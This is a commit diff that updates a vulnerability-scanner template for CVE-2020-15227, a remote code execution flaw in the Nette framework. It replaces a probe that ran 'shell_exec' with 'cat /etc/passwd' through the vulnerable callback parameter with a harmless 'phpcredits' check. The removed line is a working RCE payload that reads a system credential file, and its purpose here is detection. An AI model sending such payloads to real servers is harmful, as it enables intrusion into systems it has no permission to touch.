Merge pull request #9282 from Michal-Mikolas/15227

Improved detection of CVE-2020-15227, now independent of server OS
2024-03-06 15:29:47 +05:30 · 2024-03-06 15:29:47 +05:30 · 025d3ab311
parent 30a72f95c3 c27132c76f
commit 025d3ab311
1 changed files with 13 additions and 8 deletions
--- a/http/cves/2020/CVE-2020-15227.yaml
+++ b/http/cves/2020/CVE-2020-15227.yaml
@ -27,20 +27,25 @@ info:
    max-request: 1
    vendor: nette
    product: application
+    fofa-query: app="nette-Framework"
+    verified: true
  tags: cve2020,cve,nette,rce

 http:
  - method: GET
    path:
-      - "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"
+      - "{{BaseURL}}/nette.micro/?callback=phpcredits"

    matchers-condition: and
    matchers:
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
+      - type: word
+        part: body
+        words:
+          - "PHP Credits"

-      - type: status
-        status:
-          - 200
-# digest: 4a0a00473045022100c514809246bae4d622a6f54b7f309f8d1838a8320122852f607689aa0d8591f00220583827d07fe105e21e3f2c8d355bd4a383c60d0b9fa26ec3897668a09ea6a421:922c64590222798bb761d5b6d8e72950
+      - type: word
+        part: header
+        words:
+          - "Nette Framework"
+
+# digest: 4a0a00473045022100c514809246bae4d622a6f54b7f309f8d1838a8320122852f607689aa0d8591f00220583827d07fe105e21e3f2c8d355bd4a383c60d0b9fa26ec3897668a09ea6a421:922c64590222798bb761d5b6d8e72950